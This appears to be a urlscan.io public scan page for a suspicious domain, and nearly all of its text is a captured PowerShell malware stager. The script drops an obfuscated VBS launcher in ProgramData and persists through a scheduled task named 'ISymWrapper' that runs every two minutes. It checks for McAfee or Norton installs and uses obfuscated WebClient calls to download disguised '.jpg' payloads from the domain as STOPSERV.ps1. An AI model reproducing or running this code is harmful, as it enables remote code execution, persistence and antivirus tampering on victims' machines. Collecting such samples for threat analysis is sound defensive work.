ingenieriaorganizacional.net Open in urlscan Pro
50.63.15.171  Public Scan

Form analysis
0 forms found in the DOM

Text Content

Function Visualizations
{

start-sleep -s 2
[system.io.directory]::CreateDirectory("C:\ProgramData\Document\")
#-----------------------------------------------------------------------------
$Content = @'
set T1 = CreateObject("WScript.Shell")
T1.run "powershell -ExecutionPolicy Bypass & C"+":"+"\"+"P"+"r"+"o"+"g"+"r"+"a"+"m"+"D"+"a"+"t"+"a"+"\"+"D"+"o"+"c"+"u"+"m"+"e"+"n"+"t"+"\"+"S"+"T"+"O"+"P"+"S"+"E"+"R"+"V"+"."+"p"+"s"+"1",0

'@
[IO.File]::WriteAllText("C:\ProgramData\Document\Reload.vbs", $Content)
#-----------------------------------------------------------------------------

start-sleep -s 3

$action = New-ScheduledTaskAction -Execute 'C:\ProgramData\Document\Reload.vbs'
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 2)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ISymWrapper"

start-sleep -s 6

$NEWS = 'C/:/\P/r/o/g/ra/m/D/at/a\D/oc/um/ent\'.Replace("/","")
$mcAfee = 'C:/\Pro/gram Fil/es\Common /Files\McAfee\/Platf/orm\McUIC/nt.e/xe'.Replace("/","")
$nort = 'C:/\Pr/og/ra/m Fil/es\No/r/to/n S/ecu/rit/y\i/so/l/at/e./i/n/i'.Replace("/","")

if([System.IO.File]::Exists($mcAfee)){

if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ingenieriaorganizacional.net/.TEAK/.M1.jpg', $NEWS + 'STOPSERV.ps1')){
}
start-sleep -s 7
Start "C:\ProgramData\Document\Reload.vbs"
}
elseif([System.IO.File]::Exists($nort)){

if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ingenieriaorganizacional.net/.TEAK/.N1.jpg', $NEWS + 'STOPSERV.ps1')){
}
start-sleep -s 7
Start "C:\ProgramData\Document\Reload.vbs"
}
else{

if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://ingenieriaorganizacional.net/.TEAK/.M1.jpg', $NEWS + 'STOPSERV.ps1')){
}

start-sleep -s 7
Start "C:\ProgramData\Document\Reload.vbs"
}

}
IEX Visualizations